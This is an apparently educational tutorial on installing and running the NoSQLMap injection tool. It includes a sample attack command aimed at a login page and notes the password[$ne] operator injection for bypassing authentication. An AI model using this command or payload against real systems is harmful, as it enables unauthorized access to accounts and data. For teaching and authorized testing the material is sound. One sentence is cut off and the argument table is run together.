NoSQLMap
NoSQLMap — an open-source Python tool — is designed to audit, automate injection attacks, and exploit default configuration weaknesses in NoSQL databases (as well as web applications using NoSQL) in order to disclose data from the database.
This is an old tool so it is better to install in a virtual environment.
git clone https://github.com/codingo/NoSQLMap.git
virtualenv --python=python2 /home/student/nosqlmap-env
source /home/student/nosqlmap-env/bin/activate
pip install certifi==2018.10.15
cd NoSQLMap
python setup.py install
To run, use the nosqlmap.py command.
An example of how NoSQLMap could be used to attack a login page. The
nosqlmap.py --attack 2 --victim <target-host> --webPort 80 --uri /login --httpMethod POST --postData email,<target-email>,password,<random-password> --injectedParameter 1 --injectSize 4 --injectFormat 2 --savePath output.log
| Argument | Description |
|---|---|
| --attack 2 | Use the NoSQL Web APP attacks |
| --victim target.lan | The target host is target.lan |
| --webPort 80 | The target webserver is listening on port 80 | --uri /login | The web path to attack | --httpMethod POST | Use POST requests | --postData email,test@test.test,password,qwerty | Use this CSV data for POST request | --injectedParameter 1 | Inject into the first parameter (as listed by NoSQLMap) | --injectSize 4 | The injected random string values should be 4 characters long | --injectFormat 2 | For injected strings, use the “letters only” format | --savePath output.log | Save all findings to a file called output.log
From the list of exploitable requests you can see that instead of a request containing the password field, NoSQLMap suggests using password[$ne].